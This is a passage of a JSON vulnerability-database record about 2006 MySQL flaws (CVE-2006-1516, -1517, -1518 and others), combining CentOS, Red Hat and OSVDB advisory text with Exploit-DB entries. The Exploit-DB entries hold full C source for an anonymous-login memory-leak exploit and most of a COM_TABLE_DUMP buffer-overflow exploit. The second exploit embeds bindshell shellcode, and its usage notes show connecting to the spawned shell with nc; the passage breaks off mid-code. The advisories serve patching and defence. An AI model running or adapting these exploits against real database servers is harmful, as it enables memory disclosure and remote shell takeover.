(mysqld) and\r\nmany different client programs and libraries.\r\n\r\nA flaw was found in the way the MySQL mysql_real_escape() function escaped\r\nstrings when operating in a multibyte character encoding. An attacker\r\ncould provide an application a carefully crafted string containing\r\ninvalidly-encoded characters which may be improperly escaped, leading to\r\nthe injection of malicious SQL commands. (CVE-2006-2753)\r\n\r\nAn information disclosure flaw was found in the way the MySQL server\r\nprocessed malformed usernames. An attacker could view a small portion\r\nof server memory by supplying an anonymous login username which was not\r\nnull terminated. (CVE-2006-1516)\r\n\r\nAn information disclosure flaw was found in the way the MySQL server\r\nexecuted the COM_TABLE_DUMP command. An authenticated malicious user could\r\nsend a specially crafted packet to the MySQL server which returned\r\nrandom unallocated memory. (CVE-2006-1517)\r\n\r\nA log file obfuscation flaw was found in the way the mysql_real_query()\r\nfunction creates log file entries. An attacker with the the ability to call\r\nthe mysql_real_query() function against a mysql server can obfuscate the\r\nentry the server will write to the log file. However, an attacker needed\r\nto have complete control over a server in order to attempt this attack.\r\n(CVE-2006-0903)\r\n\r\nThis update also fixes numerous non-security-related flaws, such as\r\nintermittent authentication failures.\r\n\r\nAll users of mysql are advised to upgrade to these updated packages\r\ncontaining MySQL version 4.1.20, which is not vulnerable to these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2006-June/024989.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-June/024990.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-June/024998.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-June/024999.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-June/025000.html\n\n**Affected packages:**\nmysql\nmysql-bench\nmysql-devel\nmysql-server\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2006-0544.html", "edition": 6, "modified": "2006-06-10T06:39:28", "published": "2006-06-09T17:37:00", "href": "http://lists.centos.org/pipermail/centos-announce/2006-June/024989.html", "id": "CESA-2006:0544", "title": "mysql security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-12-11T13:33:05", "bulletinFamily": "unix", "cvelist": ["CVE-2006-0903", "CVE-2006-1516", "CVE-2006-1517", "CVE-2006-2753", "CVE-2006-3081", "CVE-2006-4380"], "description": "MySQL is a multi-user, multi-threaded SQL database server. MySQL is a\r\nclient/server implementation consisting of a server daemon (mysqld) and\r\nmany different client programs and libraries.\r\n\r\nA flaw was found in the way the MySQL mysql_real_escape() function escaped\r\nstrings when operating in a multibyte character encoding. An attacker\r\ncould provide an application a carefully crafted string containing\r\ninvalidly-encoded characters which may be improperly escaped, leading to\r\nthe injection of malicious SQL commands. (CVE-2006-2753)\r\n\r\nAn information disclosure flaw was found in the way the MySQL server\r\nprocessed malformed usernames. An attacker could view a small portion\r\nof server memory by supplying an anonymous login username which was not\r\nnull terminated. (CVE-2006-1516)\r\n\r\nAn information disclosure flaw was found in the way the MySQL server\r\nexecuted the COM_TABLE_DUMP command. An authenticated malicious user could\r\nsend a specially crafted packet to the MySQL server which returned\r\nrandom unallocated memory. (CVE-2006-1517)\r\n\r\nA log file obfuscation flaw was found in the way the mysql_real_query()\r\nfunction creates log file entries. An attacker with the the ability to call\r\nthe mysql_real_query() function against a mysql server can obfuscate the\r\nentry the server will write to the log file. However, an attacker needed\r\nto have complete control over a server in order to attempt this attack.\r\n(CVE-2006-0903)\r\n\r\nThis update also fixes numerous non-security-related flaws, such as\r\nintermittent authentication failures.\r\n\r\nAll users of mysql are advised to upgrade to these updated packages\r\ncontaining MySQL version 4.1.20, which is not vulnerable to these issues.", "modified": "2017-09-08T11:51:30", "published": "2006-06-09T04:00:00", "id": "RHSA-2006:0544", "href": "https://access.redhat.com/errata/RHSA-2006:0544", "type": "redhat", "title": "(RHSA-2006:0544) mysql security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:21", "bulletinFamily": "software", "cvelist": ["CVE-2006-1516"], "edition": 1, "description": "## Solution Description\nUpgrade to version 4.1.19, 5.0.21, 5.1.10 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor URL: http://www.mysql.com/\nVendor Specific News/Changelog Entry: http://dev.mysql.com/doc/refman/4.1/en/news-4-1-19.html\nVendor Specific News/Changelog Entry: http://dev.mysql.com/doc/refman/5.1/en/news-5-1-10.html\nVendor Specific News/Changelog Entry: http://dev.mysql.com/doc/connector/j/en/news-5-0-21.html\n[Vendor Specific Advisory URL](http://www.trustix.org/errata/2006/0028/)\n[Vendor Specific Advisory URL](http://www.novell.com/linux/security/advisories/2006-06-02.html)\nSecurity Tracker: 1016017\n[Secunia Advisory ID:19929](https://secuniaresearch.flexerasoftware.com/advisories/19929/)\n[Secunia Advisory ID:20002](https://secuniaresearch.flexerasoftware.com/advisories/20002/)\n[Secunia Advisory ID:20076](https://secuniaresearch.flexerasoftware.com/advisories/20076/)\n[Secunia Advisory ID:20073](https://secuniaresearch.flexerasoftware.com/advisories/20073/)\n[Secunia Advisory ID:20241](https://secuniaresearch.flexerasoftware.com/advisories/20241/)\n[Secunia Advisory ID:20871](https://secuniaresearch.flexerasoftware.com/advisories/20871/)\n[Secunia Advisory ID:20223](https://secuniaresearch.flexerasoftware.com/advisories/20223/)\n[Secunia Advisory ID:20253](https://secuniaresearch.flexerasoftware.com/advisories/20253/)\n[Secunia Advisory ID:20333](https://secuniaresearch.flexerasoftware.com/advisories/20333/)\n[Secunia Advisory ID:20457](https://secuniaresearch.flexerasoftware.com/advisories/20457/)\n[Secunia Advisory ID:20762](https://secuniaresearch.flexerasoftware.com/advisories/20762/)\n[Secunia Advisory ID:20424](https://secuniaresearch.flexerasoftware.com/advisories/20424/)\n[Secunia Advisory ID:20625](https://secuniaresearch.flexerasoftware.com/advisories/20625/)\n[Related OSVDB ID: 25228](https://vulners.com/osvdb/OSVDB:25228)\n[Related OSVDB ID: 25227](https://vulners.com/osvdb/OSVDB:25227)\nRedHat RHSA: RHSA-2006:0544\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1071\nOther Advisory URL: http://www.debian.org/security/2006/dsa-1073\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2006:084\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200605-13.xml\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1079\nOther Advisory URL: http://slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.599377\nOther Advisory URL: http://www.wisec.it/vulns.php?page=7\nOther Advisory URL: http://www.ubuntu.com/usn/usn-283-1\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2006-Jun/0011.html\nOther Advisory URL: http://www.ubuntu.com/usn/usn-306-1\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-05/0041.html\nFrSIRT Advisory: ADV-2006-1633\n[CVE-2006-1516](https://vulners.com/cve/CVE-2006-1516)\n", "modified": "2006-05-02T08:02:33", "published": "2006-05-02T08:02:33", "href": "https://vulners.com/osvdb/OSVDB:25226", "id": "OSVDB:25226", "title": "MySQL Malformed Login Packet Remote Memory Disclosure", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:21", "bulletinFamily": "software", "cvelist": ["CVE-2006-1517"], "edition": 1, "description": "## Vulnerability Description\nMySQL contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when a malicious client sends a specially crafted invalid login or COM_TABLE_DUMP packets, which will disclose arbitrary memory in error messages resulting in a loss of confidentiality.\n## Solution Description\nUpgrade to version 4.1.19, 5.0.21, 5.1.10 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nMySQL contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when a malicious client sends a specially crafted invalid login or COM_TABLE_DUMP packets, which will disclose arbitrary memory in error messages resulting in a loss of confidentiality.\n## References:\nVendor URL: http://www.mysql.com/\nVendor Specific News/Changelog Entry: http://dev.mysql.com/doc/refman/4.1/en/news-4-1-19.html\nVendor Specific News/Changelog Entry: http://dev.mysql.com/doc/refman/5.1/en/news-5-1-10.html\nVendor Specific News/Changelog Entry: http://dev.mysql.com/doc/connector/j/en/news-5-0-21.html\n[Vendor Specific Advisory URL](http://www.trustix.org/errata/2006/0028/)\n[Vendor Specific Advisory URL](http://www.novell.com/linux/security/advisories/2006-06-02.html)\nSecurity Tracker: 1016016\n[Secunia Advisory ID:19929](https://secuniaresearch.flexerasoftware.com/advisories/19929/)\n[Secunia Advisory ID:20002](https://secuniaresearch.flexerasoftware.com/advisories/20002/)\n[Secunia Advisory ID:20076](https://secuniaresearch.flexerasoftware.com/advisories/20076/)\n[Secunia Advisory ID:20073](https://secuniaresearch.flexerasoftware.com/advisories/20073/)\n[Secunia Advisory ID:20241](https://secuniaresearch.flexerasoftware.com/advisories/20241/)\n[Secunia Advisory ID:20871](https://secuniaresearch.flexerasoftware.com/advisories/20871/)\n[Secunia Advisory ID:20223](https://secuniaresearch.flexerasoftware.com/advisories/20223/)\n[Secunia Advisory ID:20253](https://secuniaresearch.flexerasoftware.com/advisories/20253/)\n[Secunia Advisory ID:20333](https://secuniaresearch.flexerasoftware.com/advisories/20333/)\n[Secunia Advisory ID:20457](https://secuniaresearch.flexerasoftware.com/advisories/20457/)\n[Secunia Advisory ID:20762](https://secuniaresearch.flexerasoftware.com/advisories/20762/)\n[Secunia Advisory ID:20424](https://secuniaresearch.flexerasoftware.com/advisories/20424/)\n[Secunia Advisory ID:20625](https://secuniaresearch.flexerasoftware.com/advisories/20625/)\n[Related OSVDB ID: 25227](https://vulners.com/osvdb/OSVDB:25227)\n[Related OSVDB ID: 25226](https://vulners.com/osvdb/OSVDB:25226)\nRedHat RHSA: RHSA-2006:0544\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1071\nOther Advisory URL: http://www.debian.org/security/2006/dsa-1073\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2006:084\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200605-13.xml\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1079\nOther Advisory URL: http://www.wisec.it/vulns.php?page=8\nOther Advisory URL: http://slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.599377\nOther Advisory URL: http://www.ubuntu.com/usn/usn-283-1\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2006-Jun/0011.html\nOther Advisory URL: http://www.ubuntu.com/usn/usn-306-1\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-05/0042.html\nGeneric Exploit URL: http://www.wisec.it/Download/vulns/my_com_table_dump_exploit.c\nFrSIRT Advisory: ADV-2006-1633\n[CVE-2006-1517](https://vulners.com/cve/CVE-2006-1517)\nBugtraq ID: 17780\n", "modified": "2006-05-02T08:02:33", "published": "2006-05-02T08:02:33", "href": "https://vulners.com/osvdb/OSVDB:25228", "id": "OSVDB:25228", "title": "MySQL Crafted COM_TABLE_DUMP Request Arbitrary Memory Disclosure", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:21", "bulletinFamily": "software", "cvelist": ["CVE-2006-1518"], "edition": 1, "description": "## Solution Description\nUpgrade to version 4.1.19, 5.0.21, 5.1.10 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor URL: http://www.mysql.com/\nVendor Specific News/Changelog Entry: http://dev.mysql.com/doc/refman/5.1/en/news-5-1-10.html\nVendor Specific News/Changelog Entry: http://dev.mysql.com/doc/connector/j/en/news-5-0-21.html\n[Vendor Specific Advisory URL](http://www.novell.com/linux/security/advisories/2006-06-02.html)\nSecurity Tracker: 1016016\n[Secunia Advisory ID:19929](https://secuniaresearch.flexerasoftware.com/advisories/19929/)\n[Secunia Advisory ID:20241](https://secuniaresearch.flexerasoftware.com/advisories/20241/)\n[Secunia Advisory ID:20871](https://secuniaresearch.flexerasoftware.com/advisories/20871/)\n[Secunia Advisory ID:20253](https://secuniaresearch.flexerasoftware.com/advisories/20253/)\n[Secunia Advisory ID:20333](https://secuniaresearch.flexerasoftware.com/advisories/20333/)\n[Secunia Advisory ID:20457](https://secuniaresearch.flexerasoftware.com/advisories/20457/)\n[Secunia Advisory ID:20762](https://secuniaresearch.flexerasoftware.com/advisories/20762/)\n[Related OSVDB ID: 25226](https://vulners.com/osvdb/OSVDB:25226)\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1071\nOther Advisory URL: http://www.debian.org/security/2006/dsa-1073\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1079\nOther Advisory URL: http://www.wisec.it/vulns.php?page=8\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2006-Jun/0011.html\nOther Advisory URL: http://www.ubuntu.com/usn/usn-306-1\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-05/0042.html\nFrSIRT Advisory: ADV-2006-1633\n[CVE-2006-1518](https://vulners.com/cve/CVE-2006-1518)\n", "modified": "2006-05-02T08:02:33", "published": "2006-05-02T08:02:33", "href": "https://vulners.com/osvdb/OSVDB:25227", "id": "OSVDB:25227", "title": "MySQL COM_TABLE_DUMP Packet Overflow", "type": "osvdb", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T14:47:45", "description": "MySQL (<= 4.1.18, 5.0.20) Local/Remote Information Leakage Exploit. CVE-2006-1516. Remote exploit for linux platform", "published": "2006-05-02T00:00:00", "type": "exploitdb", "title": "MySQL <= 4.1.18 / 5.0.20 - Local/Remote Information Leakage Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-1516"], "modified": "2006-05-02T00:00:00", "id": "EDB-ID:1742", "href": "https://www.exploit-db.com/exploits/1742/", "sourceData": "/* ****************************************************************\n \n April 21.st 2006\n \n my_anon_db_leak.c\n\n MySql Anonimous Login Memory Leak \n \n MySql <= 5.0.20\n \n MySql <= 4.1.x\n \n copyright 2006 Stefano Di Paola (stefano.dipaola_at_wisec.it)\n \n GPL 2.0\n ****************************************************************\n \n Disclaimer:\n\n In no event shall the author be liable for any damages \n whatsoever arising out of or in connection with the use \n or spread of this information. \n Any use of this information is at the user's own risk.\n \n ****************************************************************\n Compile with:\n gcc my_anon_db_leak.c -o my_anon_db_leak\n \n usage:\n my_anon_db_leak [-s path/to/socket] [-h hostname_or_ip] [-p port_num] [-n db_len]\n \n \n*/\n\n\n#include <sys/types.h>\n/* we need MSG_WAITALL - that's why this ugly #ifdef, why doesn't glibc2\nhave MSG_WAITALL in its <socketbits.h> ??\n*/\n\n#ifdef __linux__\n#include <linux/socket.h>\n#else\n#include <sys/socket.h>\n#endif\n#include <sys/socket.h>\n#include <sys/un.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <signal.h>\n#include <fcntl.h>\n#include <sys/file.h>\n#include <errno.h>\n#include <unistd.h>\n#include <netinet/in.h>\t\t/* sockaddr_in{} and other Internet defns */\n#include <netdb.h>\t\t/* needed by gethostbyname */\n#include <arpa/inet.h>\t\t/* needed by inet_ntoa */\n\n\nchar anon_pckt[] = {\n 0x3d, 0x00, 0x00, 0x01, 0x0d, 0xa6, 0x03, 0x00, 0x00, 0x00, 0x00, 0x01, 0x08, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x14, 0x99, 0xdb, 0x54, 0xb6, 0x6a,\n 0xd7, 0xc2, 0x86, 0x4c, 0x50, 0xa8, 0x14, 0xfe, 0x2e, 0x98, 0x27, 0x72, 0x0d, 0xad, 0x45, 0x73,\n 0x00\n};\t\t\t\t// len=16*4+1=65;\n\n\nint anon_pckt_len = 65;\n\n#define USOCK \"/tmp/mysql2.sock\"\n\nint\ntcp_conn (char *hostname, int port)\n{\n\n int sockfd;\n int n;\n struct sockaddr_in servaddr;\n\n struct hostent *hp;\n\n\n\n if ((hp = gethostbyname (hostname)) == 0)\n {\n perror (\"gethostbyname\");\n exit (0);\n }\n\n if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) < 0)\n {\n perror (\"socket\");\n exit (1);\n }\n\n bzero ((char *) &servaddr, sizeof (servaddr));\n servaddr.sin_family = AF_INET;\n servaddr.sin_port = htons (port);\n\n memcpy (&servaddr.sin_addr, hp->h_addr, hp->h_length);\n if (servaddr.sin_addr.s_addr <= 0)\n {\n perror (\"bad address after gethostbyname\");\n exit (1);\n }\n if (connect (sockfd, (struct sockaddr *) &servaddr, sizeof (servaddr)) < 0)\n {\n perror (\"connect\");\n exit (1);\n }\n return sockfd;\n}\n\nint\nunix_conn (char *path)\n{\n int fd, len;\n struct sockaddr_un sa;\n\n fd = socket (PF_UNIX, SOCK_STREAM, 0);\n\n if (fd < 0)\n {\n perror (\"cli: socket(PF_UNIX,SOCK_STREAM)\");\n exit (1);\n }\n\n sa.sun_family = AF_UNIX;\n strcpy (sa.sun_path, path);\n len = sizeof (sa);\n if (connect (fd, (struct sockaddr *) &sa, len) < 0)\n {\n perror (\"cli: connect()\");\n exit (1);\n }\n return fd;\n}\n\nint\nmain (int argc, char *argv[])\n{\n int fd;\n int i, ret;\n char packet[65535];\n char *path;\n char *host;\n int port = 3306;\n char buf[65535];\n int db_len = 0;\n int pckt_len = anon_pckt_len;\n int unix_sock = 1;\n char c;\n\n path = strdup (USOCK);\n host = strdup (\"127.0.0.1\");\n\n opterr = 0;\n\n while ((c = getopt (argc, argv, \"s:h:p:n:\")) != -1)\n switch (c)\n {\n case 's':\n\tpath = strdup (optarg);\n\tunix_sock = 1;\n\tbreak;\n case 'h':\n\thost = strdup (optarg);\n\tunix_sock = 0;\n\tbreak;\n case 'p':\n\tport = atoi (optarg);\n\tunix_sock = 0;\n\tbreak;\n case 'n':\n\tdb_len = atoi (optarg);\n\tbreak;\n\n default:\n\tbreak;\n }\n\n\n bzero (packet, 65535);\n\n pckt_len = anon_pckt_len + db_len;\n printf (\"%d\\n\", pckt_len);\n\n for (i = 0; i < pckt_len; i++)\n packet[i] = anon_pckt[i];\n\n if (db_len)\n for (i = anon_pckt_len - 2; i < pckt_len; i++)\n packet[i] = 'A';\n\n packet[pckt_len - 1] = '\\0';\n\n packet[0] = (char) (anon_pckt[0] + db_len) & 0xff;\n packet[1] = (char) ((anon_pckt[0] + db_len) >> 8) & 0xff;\n for (i = 0; i < pckt_len; i++)\n printf (\" %.2x%c\", (unsigned char) packet[i],\n\t ((i + 1) % 16 ? ' ' : '\\n'));\n printf (\"\\n\");\n\n\n if (unix_sock)\n fd = unix_conn (path);\n else\n fd = tcp_conn (host, port);\n\n sleep (1);\n ret = recv (fd, buf, 65535, 0);\n if (send (fd, packet, pckt_len, 0) != pckt_len)\n {\n perror (\"cli: send(anon_pckt)\");\n exit (1);\n }\n\n ret = recv (fd, buf, 65535, 0);\n for (i = 0; i < ret; i++)\n printf (\"%c\", (isalpha (buf[i]) ? buf[i] : '.'));\n printf (\"\\n\");\n return 0;\n}\n\n// milw0rm.com [2006-05-02]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/1742/"}, {"lastseen": "2016-01-31T14:47:38", "description": "MySQL <= 5.0.20 COM_TABLE_DUMP Memory Leak/Remote BoF Exploit. CVE-2006-1518. Remote exploit for linux platform", "published": "2006-05-02T00:00:00", "type": "exploitdb", "title": "MySQL <= 5.0.20 COM_TABLE_DUMP Memory Leak/Remote BoF Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-1518"], "modified": "2006-05-02T00:00:00", "id": "EDB-ID:1741", "href": "https://www.exploit-db.com/exploits/1741/", "sourceData": "/* ****************************************************************\n \n April 21.st 2006\n \n my_exploit.c\n\n MySql COM_TABLE_DUMP Memory Leak & MySql remote B0f\n \n MySql <= 5.0.20\n \n MySql COM_TABLE_DUMP Memory Leak \n \n MySql <= 4.x.x\n \n copyright 2006 Stefano Di Paola (stefano.dipaola_at_wisec.it)\n \n GPL 2.0\n ****************************************************************\n \n Disclaimer:\n\n In no event shall the author be liable for any damages \n whatsoever arising out of or in connection with the use \n or spread of this information. \n Any use of this information is at the user's own risk.\n \n ****************************************************************\n \n compile with:\n gcc -Imysql-5.0.20-src/include/ my_com_table_dump_exploit.c -Lmysql-5.0.20/lib/mysql/ -lmysqlclient -o my_exploit\n\n Then:\n\n my_exploit [-H] [-i] [-t 0xtable-address] [-a 0xthread-address] [[-s socket]|[-h host][-p port]][-x]\n\n -H: this Help;\n -i: Information leak exploit (shows the content of MySql Server Memory)\n -x: shows c/s communication output in hexadecimal\n -t: hexadecimal table_list struct address (by default we try to find it automatically)\n -a: hexadecimal thread struct address (look at the error log to see something like: thd=0x8b1b338)\n -u: mysql username (anonymous too ;)\n -p: mysql userpass (if you need it)\n -s: the socket path if is a unix socket\n -h: hostname or IP address\n -P: port (default 3306)\n\n\n Example_1 - Memoryleak: my_exploit -s socketpath -u username -i \n\n Example_2 - Remote Shell: my_exploit -h 127.0.0.1 -u username -a 0x8b1f468\n\n For memory leak:\n\n my_exploit -i [-u user] [-p password] [-s socket|[-h hostname [-P port]]]\n\n For the bindshell to port 2707\n my_exploit [-t 0xtableaddress] [-a 0xthdaddress] [-u user] [-p password] [-s socket|[-h hostname [-P port]]]\n\n then from another shell:\n nc 127.0.0.1 2707\n id\n uid=78(mysql) gid=78(mysql) groups=78(mysql)\n\n\n\n*/\n\n#include <stdio.h>\n#include <mysql.h>\n#include <unistd.h>\n\n\n\n// we need to know the thread struct address pointer and the table_list.\n// these are defaults, change them from command line.\nint thd = 0x8b1b338;\nint tbl = 0x8b3a880;\n\n#define USOCK2 \"/tmp/mysql.sock\"\n\nchar addr_tdh[4];\nchar addr_tbl[4];\nchar addr_ret[4];\n\n// constants to overwrite packet with addresses for table_list thread and our shell.\n#define TBL_POS 182\n#define THD_POS 178\n#define RET_POS 174\n#define SHL_POS 34\n\n// bindshell spawns a shell with on port 2707\nchar shcode[] = {\n 0x6a, 0x66, 0x58, 0x6a, 0x01, 0x5b, 0x99, 0x52, 0x53, 0x6a, 0x02, 0x89\t// 12\n ,0xe1, 0xcd, 0x80, 0x52, 0x43, 0x68, 0xff, 0x02, 0x0a, 0x93, 0x89, 0xe1\n ,0x6a, 0x10, 0x51, 0x50, 0x89, 0xe1, 0x89, 0xc6, 0xb0, 0x66, 0xcd, 0x80\n ,0x43, 0x43, 0xb0, 0x66, 0xcd, 0x80, 0x52, 0x56, 0x89, 0xe1, 0x43, 0xb0\n ,0x66, 0xcd, 0x80, 0x89, 0xd9, 0x89, 0xc3, 0xb0, 0x3f, 0x49, 0xcd, 0x80\n ,0x41, 0xe2, 0xf8, 0x52, 0x68, 0x6e, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x2f\n ,0x62, 0x69, 0x89, 0xe3, 0x52, 0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80\t// 12*7= 84\n};\n\nint tmp_idx = 0;\n\nint dump_packet_len = 7;\nchar table_dump_packet[] = { 0x03, 0x00, 0x00, 0x00, 0x13, 0x02, 0x73 };\n\nint payload_len = 371;\n// header packet + select '1234567890...etc'\nchar query_payload[] = {\n 0x6f, 0x01, 0x00, 0x00, 0x03, 0x73, 0x65, 0x6c, 0x65, 0x63, 0x74, 0x20, 0x27, 0x31, 0x32, 0x33\t// 16 Some junk from position 6 ...\n , 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x31, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36\t// 32\n , 0x37, 0x38, 0x39, 0x30, 0x5f, 0x32, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39\t// 48\n , 0x30, 0x5f, 0x33, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x34\t// 64\n , 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x35, 0x5f, 0x31, 0x32\t// 72\n , 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x36, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35\t// 88\n , 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x37, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38\t// 94\n , 0x39, 0x30, 0x5f, 0x38, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x6a\t// 112\n , 0x0b, 0x58, 0x99, 0x52, 0x68, 0x6e, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x2f, 0x62, 0x69, 0x89, 0xe3\t// 128 endsh 118\n , 0x52, 0x53, 0x89, 0xe1, 0xcd, 0x80, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4c, 0x4d\t// 144\n , 0x4e, 0x4f, 0x50, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x5a, 0x5f, 0x61, 0x61, 0x62, 0x62, 0x63\t// 160\n , 0x63, 0x64, 0x64, 0xa0, 0xe9, 0xff, 0xbf, 0xa0, 0xe9, 0xff, 0xbf, 0xa0, 0xe9, 0x6c, 0xbf, 0x6d\t// 176\n , 0x6d, 0x6e, 0x6e, 0xff, 0x6f, 0x70, 0x70, 0x71, 0x71, 0x72, 0x72, 0x73, 0x73, 0x74, 0x74, 0x75\t// 192 178\n , 0x75, 0x76, 0x76, 0x7a, 0x7a, 0x5f, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d\t// 208\n , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d\t// 224\n , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d\t// 240\n , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d\t// 256\n , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d\t// 272\n , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d\t// 288\n , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d\t//\n , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d\t//\n , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d\t//\n , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d\t//\n , 0x3d, 0x3d, 0x27\n};\t\t\t\t// 16*23+3 = 371\n\n\n\n\nstatic int s = 0, c = 0;\nint fd = 0;\nint d = 1;\nint hexdump = 0;\nchar buf[65535];\n\n\nMYSQL *conn;\t\t\t/* pointer to connection handler */\n\n\nint\nsendit (char *buf1, int fdest, int dblen)\n{\n int len1;\n int i = 0;\n int ret = 0;\n printf (\"%d\\n\", d);\n if (d == 2)\n {\n // let's prepare the query packet \n int o;\n int position = 14;\n\n tmp_idx = 3;\n\n\n int ret = tbl - 0x106 + 33;\n\n for (i = 0; i < 32; i += 8)\n\taddr_ret[tmp_idx--] = (ret >> i) & 0xff;\n\n tmp_idx = 3;\n for (i = 0; i < 32; i += 8)\n\taddr_tdh[tmp_idx--] = (thd >> i) & 0xff;\n\n tmp_idx = 3;\n for (i = 0; i < 32; i += 8)\n\taddr_tbl[tmp_idx--] = (tbl >> i) & 0xff;\n printf (\"ret %x\\n\", ret);\n\n\n#if 1\n tmp_idx = 0;\n for (o = THD_POS; o > THD_POS - 4; o--)\n\tquery_payload[o] = addr_tdh[tmp_idx++];\n\n tmp_idx = 0;\n for (o = TBL_POS; o > TBL_POS - 4; o--)\n\tquery_payload[o] = addr_tbl[tmp_idx++];\n\n tmp_idx = 0;\n for (o = RET_POS; o > RET_POS - 4; o--)\n\tquery_payload[o] = addr_ret[tmp_idx++];\n#else\n for (; position < payload_len - 12; position += 12)\n\t{\n\t tmp_idx = 0;\n\t printf 